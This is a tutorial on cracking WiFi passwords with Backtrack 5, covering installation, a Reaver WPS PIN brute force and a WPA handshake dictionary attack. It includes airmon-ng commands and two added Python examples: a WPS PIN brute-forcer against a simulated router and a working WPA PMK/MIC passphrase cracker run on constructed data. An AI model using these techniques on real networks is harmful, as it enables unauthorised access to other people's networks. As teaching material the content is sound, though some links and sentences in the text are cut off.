For educational purposes, in this article we will see how to crack a WiFi password using a well-known penetration-testing distribution, Backtrack 5 R3, which can help patient people to.
Published (last): 2 June 2010
Backtrack 5 R3 is a well-known Linux distribution for digital forensics, intrusion detection and penetration testing, bundling a large collection of security tools. If you have never used Backtrack before, all you really need to know is that it is one of the best environments for digital forensics, intrusion detection and penetration testing.
There are different types of wireless attacks, but in practice only two main types are used, and I will go step by step through each. If you already have Backtrack 5 installed, the first chapter can be skipped and you can go directly to the attack you would like to use. The two main types of wireless attacks are the WPA dictionary attack against a captured handshake, and the WPS PIN attack with Reaver. In the past WEP was the main encryption used on routers, but WEP was notoriously easy to crack and is rarely seen any more.
WPA and WPA2 differ in the cipher they use (TKIP versus AES-CCMP), but both derive the key from the passphrase in the same way and use the same four-way handshake, so from the attacker's point of view they are cracked identically; both are much harder to crack than WEP. The way you think about these attacks is as important as the attacks themselves.
There is no point-and-click option. Learning commands and typing them in a terminal window is a must. Buying multiple routers to practise on is also a good idea; there are plenty to be found at yard sales and swap meets on the cheap. Different manufacturers do different things and ship different setups, so one router will have a weakness that another will not.
One thing to mention is that an internal wireless network adapter will usually not work with Backtrack for wireless penetration testing. This is not because the adapter is unsupported (it may or may not be), but because most built-in wireless chipsets do not support monitor mode and packet injection, which a wireless attack requires. To see an updated list of supported adapters go here: www. Backtrack 5 is free to download and install and can be downloaded here.
There are three ways to install Backtrack: install it to the hard drive, boot off a DVD or flash drive, or run it in virtualization. I will talk about how each install works, but if you are new to Backtrack 5 the easiest way is to burn the Backtrack 5 ISO to a DVD or a flash drive and boot from it; of course, once the computer restarts, data will be lost unless it is saved to persistent storage. Installing Backtrack 5 to the hard drive is the same as installing any operating system, which most everyone is familiar with: boot from the disk, choose install and answer questions such as time, date, language and how to format the disk.
Running Backtrack 5 within virtualization is possibly the most common way, mainly because a familiar operating system such as Windows can run at the same time and files can be transferred between the two easily. This does take up computing resources, and it can add another layer of troubleshooting if a problem arises, such as Backtrack not recognizing a USB adapter. If you are just starting out I would begin with a boot DVD and move on to virtualization later, but this is a personal choice and depends on your own experience and knowledge of operating systems.
The download can be found here http: If you have never downloaded a torrent, it is simple. First download and install a torrent client; the most popular is uTorrent, but there are many. Then click the link to the torrent and the client will download the file. ISO burning software will be needed to write the image to a DVD. To boot from the DVD, put it into the computer's drive and check the computer's settings to boot from the disk. Most computers have a boot option button to press, or will automatically boot the disk.
Once it boots from the DVD it should come to the boot menu. The default username for Backtrack is root and the default password is toor. Once logged in at the command prompt (the pound symbol, #), type "startx" and this will start the graphical user interface.
Installing to the hard drive starts the same way as booting off the DVD above; once the desktop is up, double-clicking the install icon will install Backtrack to the hard drive. Any existing operating system will be wiped out and only Backtrack will remain if this is done, so I do not recommend installing to the hard drive unless you have done this before. Backtrack can be set up to dual boot alongside an existing operating system, but explaining how to do a dual boot is more advanced, and if something goes wrong the existing operating system will be gone or damaged.
Running two operating systems at the same time is quite common now and is done relatively easily. For those who do not know, VMware is a way to run another operating system virtually within an existing operating system.
Basically, if you are running Windows and want to run Backtrack 5 at the same time, you can do this with VMware. VMware works very well, and as long as you have a fairly recent computer it should run fine.
If you have an older computer, the ISO may be better, mainly because an ISO can be burned to a disk or any bootable device and booted from. VMware Workstation is not exactly cheap, although there is a free version: there is a 30-day free trial for VMware Workstation if you want to check it out, and VMware Player doesn't come with all the options Workstation does, but it does work and runs Backtrack 5 fine. VMware Player can be downloaded here http: The Backtrack 5 VMware image file will have to be extracted and will create its own folder with a bunch of files in it. Only one file will show up with the .vmx extension; open that one and you will be able to play the virtual machine and run Backtrack 5.
Commands we will be using. Reaver is one of the best tools to come along in a long time. Cracking WEP was easy, but when WPA became the standard it became much harder to do, and the dictionary attack was the only real option.
WPS (Wi-Fi Protected Setup) makes it easy for wireless devices to find and connect to a router using an eight-digit PIN. The problem with WPS is a design flaw that lets someone go around the WPA encryption entirely: the router confirms the first four digits and the last three digits of the PIN separately, and the eighth digit is a checksum, so at most about 11,000 PINs have to be tried instead of 100 million. If a router has WPS enabled then cracking the encryption is no longer necessary. Think of it like a backdoor. If a router has WPS enabled it can usually be cracked in two to ten hours. Reaver does not attempt to take on the WPA encryption itself but goes around it by recovering the WPS PIN; the router then hands over the WPA passphrase, which Reaver displays.
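The following Python example is added here to show why the PIN attack is feasible; it is not part of the original article and not Reaver's code. It implements the WPS PIN checksum and a half-by-half brute force against a constructed stand-in for the router, which answers whether each half of the PIN is correct just as the real registrar protocol does at messages M4 and M6. The router class, the message names and the secret PIN are assumptions made for the example.

```python
# Added example (not from the original article, and not Reaver's own code):
# why a WPS PIN can be brute-forced in hours. The eighth digit of an 8-digit
# WPS PIN is a checksum of the first seven, and the registrar protocol reveals
# separately whether the first four digits (at message M4) and the last three
# (at message M6) are right. The attacker therefore needs at most
# 10**4 + 10**3 = 11,000 guesses instead of 10**7. The router below is a
# constructed stand-in for that oracle; the secret PIN is made up.


def wps_checksum(first7: int) -> int:
    """Checksum digit for the first seven digits of a WPS PIN
    (weighted sum 3,1,3,1,... over the digits, as in the WPS specification)."""
    accum = 0
    pin = first7
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if an 8-digit PIN string carries the correct checksum digit."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])


def max_guesses() -> int:
    """Upper bound on PIN attempts: every first half plus every second half."""
    return 10**4 + 10**3


class SimulatedRegistrar:
    """Stand-in for a WPS-enabled router (constructed, not a real protocol
    implementation). check_first_half() models the M4 ACK/NACK and
    check_second_half() the M6 ACK/NACK that Reaver observes."""

    def __init__(self, secret_pin: str):
        if not is_valid_pin(secret_pin):
            raise ValueError("secret PIN must have a valid checksum")
        self._secret = secret_pin
        self.m4_attempts = 0
        self.m6_attempts = 0

    def check_first_half(self, half: str) -> bool:
        self.m4_attempts += 1
        return half == self._secret[:4]

    def check_second_half(self, half: str) -> bool:
        self.m6_attempts += 1
        return half == self._secret[4:]


def brute_force_pin(ap: SimulatedRegistrar) -> str:
    """Recover the PIN half by half, the way Reaver does."""
    # Phase 1: at most 10,000 candidates for the first four digits.
    first = None
    for i in range(10_000):
        candidate = f"{i:04d}"
        if ap.check_first_half(candidate):
            first = candidate
            break
    if first is None:
        raise RuntimeError("first half not found")
    # Phase 2: at most 1,000 candidates for digits five to seven; the eighth
    # digit is computed from the checksum, so it is never guessed.
    for j in range(1_000):
        tail = f"{j:03d}"
        tail += str(wps_checksum(int(first + tail)))
        if ap.check_second_half(tail):
            return first + tail
    raise RuntimeError("second half not found")


if __name__ == "__main__":
    router = SimulatedRegistrar("12345670")  # constructed secret PIN
    pin = brute_force_pin(router)
    print(pin, router.m4_attempts + router.m6_attempts, "attempts, of at most", max_guesses())
```

The attempt counters make the point concrete: even the worst-case PIN (99999995) costs exactly 11,000 round trips, and a real router that rate-limits or locks WPS after a burst of failures is what stretches those round trips into the hours quoted above.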
Reaver has some practical limitations, such as signal strength: a strong signal is almost a must. Also, some routers can crash, or lock WPS for a while, if too many PINs get thrown at them too quickly, much like a denial of service attack can crash a PC. Reaver has many options, or switches, it can use to deal with these problems. The example I am using below is a basic one. The first thing we need to do is get the wireless USB adapter working. Start Backtrack 5 and open two terminal windows.
Run the command "airmon-ng" to see if Backtrack recognizes your wireless USB adapter. It should show "wlan0" along with the chipset and driver; if it doesn't, then some troubleshooting will have to be done until it does. Once the wireless USB adapter is working we need to put it into monitor mode. To do this run the command "airmon-ng start wlan0". If all goes well the screen will scroll by with some information and then say "monitor mode enabled on mon0".
Finding a WPS-enabled router is the next step. This used to be hard to do until the "wash" command came along. I believe I have found a fix that has been working for me on both Backtrack 5 and Kali Linux: first make a directory like this, then run wash. If nothing comes up, then no WPS-enabled router is within reach. Only if the wash command finds nothing, run the following command to see all access points within your reach. Now we can get to using Reaver.
In the second terminal window run the Reaver command. Reaver will now run and start a brute-force attack against the PIN of the router. It will run until it finds the wireless password, usually within the two to ten hours mentioned above.
A dictionary attack is one of the easiest to understand but the least likely to find a password. This is often the last resort because, while it does work, it depends on the dictionary used and the computing power available. Basically, the four-way handshake between a client and the router is captured wirelessly when someone connects to the router; that handshake contains enough material to test candidate passphrases offline. If you know the person you may be able to guess the password, but otherwise this can take a long time and never find anything.
If you are stuck using this method, thinking about how the password might be structured will be crucial, along with computing power. The captured handshake can be copied to multiple computers and the dictionary split between them, A to F on one, G to Z on another. Cloud computing might be an option to rent someone else's computing power, and so on. There are other ways, such as rainbow tables (which for WPA must be precomputed per network name, because the SSID salts the key derivation) or cracking on a video card (GPU), but the simplest way to crack WPA is brute force with a dictionary.
The way this works is that each word from a large dictionary is run through the same key derivation the router uses, with the network name as salt, and the result is checked against the captured handshake, until one candidate matches. If the password is easy then it will be found quickly; if it is a long passphrase with many different number and letter combinations then it will be much harder.
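The following Python example is added here to show the computation the dictionary attack performs; it is not from the original article and is not aircrack-ng's code. It derives the PMK from a candidate passphrase and the SSID, expands it to the PTK with the handshake nonces and MAC addresses, and recomputes the MIC of the captured EAPOL-Key frame with the resulting KCK. The SSID, MAC addresses, nonces, EAPOL frame and wordlist are all constructed for the example; the frame uses the real EAPOL-Key field offsets but carries no key data.

```python
import hashlib
import hmac

# Added example (not from the original article and not aircrack-ng's code):
# the arithmetic behind a WPA/WPA2-PSK dictionary attack. Each candidate
# passphrase is run through the same key derivation the router and client use
# (PBKDF2-HMAC-SHA1, SSID as salt, 4096 iterations, 32-byte PMK), expanded
# into the PTK with the two MAC addresses and the two handshake nonces, and
# the first 16 bytes (the KCK) are used to recompute the MIC of the captured
# EAPOL-Key frame. A matching MIC means the candidate is the network
# passphrase. The SSID, MACs, nonces, frame and wordlist below are all
# constructed for this example, not captured from a real network.


def derive_pmk(passphrase: bytes, ssid: bytes) -> bytes:
    """PSK/PMK as defined by IEEE 802.11i for a passphrase-based network."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def prf512(pmk: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: concatenated HMAC-SHA1(PMK, label || 0x00 || data || i)."""
    label = b"Pairwise key expansion"
    blocks = [
        hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    ]
    return b"".join(blocks)[:64]


def derive_ptk(pmk, ap_mac, client_mac, anonce, snonce) -> bytes:
    """PTK = PRF-512(PMK, min(MACs) || max(MACs) || min(nonces) || max(nonces))."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, data)


MIC_OFFSET = 81  # EAPOL header (4 bytes) + key descriptor fields up to the Key MIC


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """MIC for key descriptor version 2 (WPA2/AES): HMAC-SHA1 over the frame
    with its 16-byte MIC field zeroed, truncated to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_wpa(ssid, ap_mac, client_mac, anonce, snonce, frame, wordlist):
    """Return the first passphrase in wordlist that reproduces the captured MIC,
    else None. wordlist is any iterable, so splitting the dictionary across
    machines means handing each machine its own slice."""
    captured_mic = frame[MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        pmk = derive_pmk(word.encode(), ssid)
        kck = derive_ptk(pmk, ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, frame), captured_mic):
            return word
    return None


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key message 2 (client -> AP) with real field offsets but
    an empty key data field; used only to construct the sample capture."""
    body = (b"\x02"                    # descriptor type: RSN key descriptor
            + b"\x01\x0a"              # key info: version 2, pairwise, MIC present
            + b"\x00\x10"              # key length
            + b"\x00" * 7 + b"\x01"    # replay counter
            + snonce                   # 32-byte SNonce
            + b"\x00" * 16             # key IV
            + b"\x00" * 8              # key RSC
            + b"\x00" * 8              # key ID (reserved)
            + mic                      # 16-byte key MIC
            + b"\x00\x00")             # key data length (no RSN IE here)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


# --- constructed sample capture; the true passphrase is used only to build it ---
SSID = b"HomeNet-2010"
AP_MAC = bytes.fromhex("0013101e2f3a")
CLIENT_MAC = bytes.fromhex("00241d5b6c7e")
ANONCE = bytes(range(0x10, 0x30))
SNONCE = bytes(range(0x40, 0x60))
_true_kck = derive_ptk(derive_pmk(b"sunflower2010", SSID),
                       AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
CAPTURE_FRAME = build_eapol_msg2(SNONCE, eapol_mic(_true_kck, build_eapol_msg2(SNONCE)))
WORDLIST = ["password", "12345678", "letmein", "sunflower2010", "qwertyuiop"]

if __name__ == "__main__":
    print(crack_wpa(SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, CAPTURE_FRAME, WORDLIST))
```

The cost of the attack sits almost entirely in derive_pmk: 4096 HMAC-SHA1 iterations per candidate, which is why GPUs and per-SSID precomputation help, and why a passphrase that is not in any wordlist never falls to this method regardless of hardware.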
Open two terminal windows. Run the command "airmon-ng" to see if your USB adapter shows up; if it doesn't, then some troubleshooting as to why it is not will have to be done. Once you know the adapter is connected and operating, run "airmon-ng start wlan0" (as above) to get the adapter into monitor mode.
Now we want to see what routers or access points (APs) are out there, so we run the scan command. Leave the original terminal alone and move to the second open terminal.